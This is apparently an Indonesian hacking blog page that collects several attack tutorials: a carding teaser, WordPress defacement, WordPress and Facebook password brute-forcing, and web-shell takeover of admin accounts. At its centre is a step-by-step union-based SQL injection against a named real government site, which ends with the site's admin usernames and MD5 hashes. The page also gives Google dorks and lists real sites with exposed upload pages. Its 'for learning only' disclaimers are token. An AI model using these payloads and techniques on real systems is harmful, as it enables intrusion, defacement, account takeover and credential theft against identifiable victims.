Hey hey hey ketemu gw lagi..nih Sobbat Bnyk Yg Minta Pingin Carding
Ingget Yg Om Ini Cuman Untuk Pembelajaran Doang Jgn Di Salah Gunakan
Tampilkan postingan dengan label HACKING. Tampilkan semua postingan
Ane Share Formatnya html Om Jadi Klo Buka Lihat Gambar Di Bawah Ini Om

okke Nihh Dowlod File htmlnye Sebelum Downlod Harus Join Group Dulu Om Soalnya Ane Uplod Di Group
Tags: Cara Carding, Cara Mendapat CreditCard, Cara Mendapat KartuKredit,

Kali Ini Ane Share Tutorial Tebas Index Wordpress Tanpa Tanem Shell :v Biasnya Wordpress KaanGk Bisa Di Tanemin Shell Jadi Y Langsung Saja Kerugianya Admin Sanggat Gampng Untuk Backup
1).Join Group Dulu : https://www.facebook.com/groups/662377320447873/
2).Buka Halaman Login Truss Login

3).Klo Sudh Truss Ke Appearance => Editor

4).Klik Tulisan Main Index Template Truss Edit Save Dehh

Good Job !!
Pengertian SQL Injection
SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter :
id=$id;……. > Got Error
Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.
Contoh :
http://situstarget.com/news.php?id=1’
http://situstarget.com/news.php?id=’1
Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.
Dork SQLi :
inurl:azerty.php?id= ,Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.
http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error
Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.
Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.
Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--
Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.
Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--
Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--
Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--
Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D
Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*
Content Creator : Onix AQua
UPDATE: Link sudah diperbaiki... :)
Salam Sobat,, ;)
Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)
Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Pertama Download Bahan-Bahannya:
WPBruteforce
Password: http://indocyberarmy.blogspot.com
Dork: inurl:/wp-login.php
Yup, saatnya kita beraksi.. :)
Live Target: http://live-target.pusku.com/
Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute
Lalu buka comand dengan cara : Klik Start>Run>ketik cmd
Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!
ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
Lalu setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10
Lalu tekan enter!
Tunggu proses hingga selesai!
Wew! Berhasil tuh! wkwkwk Mantap! :p
Langsung Login dah!
GoodLuck!! :D
Content Created By : Onix AQua
Tag : Cara Deface Wordpress, Brute Attack Wordpress, Deface Website Mudah

Okke Kali Ini Saya Akan Share Tools Hack Akun Facebook With Python Inget Ya Om Trik Ini Untuk Kebaikan Jgn Di Salah Gunain (y)
1).Join Group Dulu Biar Kalo Ntar Tanya Enakk Klik Disini
2).Siapin Bahan-Bahanya Dulu :
-Python 2.7 ( Google Om Banyak )
-Toolsnya ( Download Disni )
-Pakek Otak Buat Pikir Wordlistnya
3).Kalo Sudah Download Python Langsung Buka CMD Letak File Saya Di LocalDisk D Maka Contohnya Seperti Ini

4).Tambahkan Tulisan Lagi facebook.py Lalu Tekan Enter

5).Kalo Sudah Begitu Masukin Emailnya Truss Wordlistnya Truss Tekan Enter Kalo Buka facebook.py Error Ntar Lihat Tutorial Di Bawah Sendiri

.Jika Error Waktu Buka File facebook.py Downlod Dulu Mechanize Klik Disini
Tuss Buka CMD Lagi Ketikan D: Enter cd mechanize Enter

Lalu Masukan setup.py install Truss Tekan Enter Jika Terinstall Coba Ulangi Dari Nomor 4

NB : Kembangin Wordlist Biar Maknyussss
Tag : Hack Akun Facebook,Crack Akun Facebook,Hacking
Bahan yang dibutuhkan :
1).Shell => Downlad Disini Password: garudacyberattacker2).cPanel
3).Encrypter Klik Disini
Langsung saja simak
1).Buka cPanel Lalu Upload Shell Yang Tadi Jika Sudah Buka Dengan Cara
http://site.com/namafile.php
2).Klik Eval Truss Klik Go ! Broo

3).Jika Sudah Akan Keluar Seperti Ini Lalu Copy Dan Ke Config

4).Lalu Pastekan Copyan Tadi Ke Kotak Lalu Klik Hajar Lihat Gambar Di Bawah Ini

5).Jika Sudah ada Tulisan Done Silahkan Buka Url Kmu Dengan Cara
http://Site.com/config

6).Klik Dan Akan Keluar Seperti Gambar

7).Buka Shell Lagi Trus Ky MySql Lalu Masukin Database Username Sama Password Tadi
Jika Anda Berhasil Login Akan Keluar Seperti Ini Lalu Klik Tables Yg Di bawah Sendiri

8).Jika Sudah Cari Yg Blakangnya User Lalu Klik Data

9).Klik Edit

10).Lalu Ke Encrypter Tadi Trus Masukin Password Anda Misal 123456

11).Copykan Md5 Hashnya Ke Edit Tadi Trus Klik Edit

12).Lalu Login Dehh Ke Site Adminya
Wordpress: wp-Admin
Joomla : administrator
13).Enjoy Om
Demonya Om : http://www.nomorebackpain-info.com/
NB: JIKA ADA YG DITANYAKAN KOMENTAR DI BAWAH
ok let's go
Dork : Inurl:upload.php intext:"htm html" site:.com / org / net etc
Intext:Powered by: Silentum Uploader
File yang dibenarkan hanyalah yang seperti berikut: .doc, .htm, .html, .odt, .pdf, .rtf, .sxw, .txt and etc
Demo All Website Vuln
http://bn.thedocumentsguy.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.thiagocavaleiro.com.br/site/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.webstyling.it/script/php/upload/3/upload.php
http://www.hiphopcars.com/black_models_divas/upload.php
1).Pertama Join Group Dulu Ya Klik Disini
2).Kalo Sudah Kebuka Masukan Domain Yang Anda Ingkinkan Example seo-cyber.com


Contoh :
IP:64.31.11.114 .php?
2).Kalo Sudah Kebuka Masukan Domain Yang Anda Ingkinkan Example seo-cyber.com

3). Klik Check Ntar Kelihatan IP nya Kalo kgk Keliatan Berarti Anda Mahoo Kwkwk

4).Buka Bing.com Lalu Masukan Dork Berikut
IP:IP KAMU .php?
Contoh :
IP:64.31.11.114 .php?
Dork Bisa Di Kembangin Biar Lebihh Joss
5).Lalu Tinggal Eksekusi Dehh Ane Saranin Untuk Pakek SQL Injection,Havij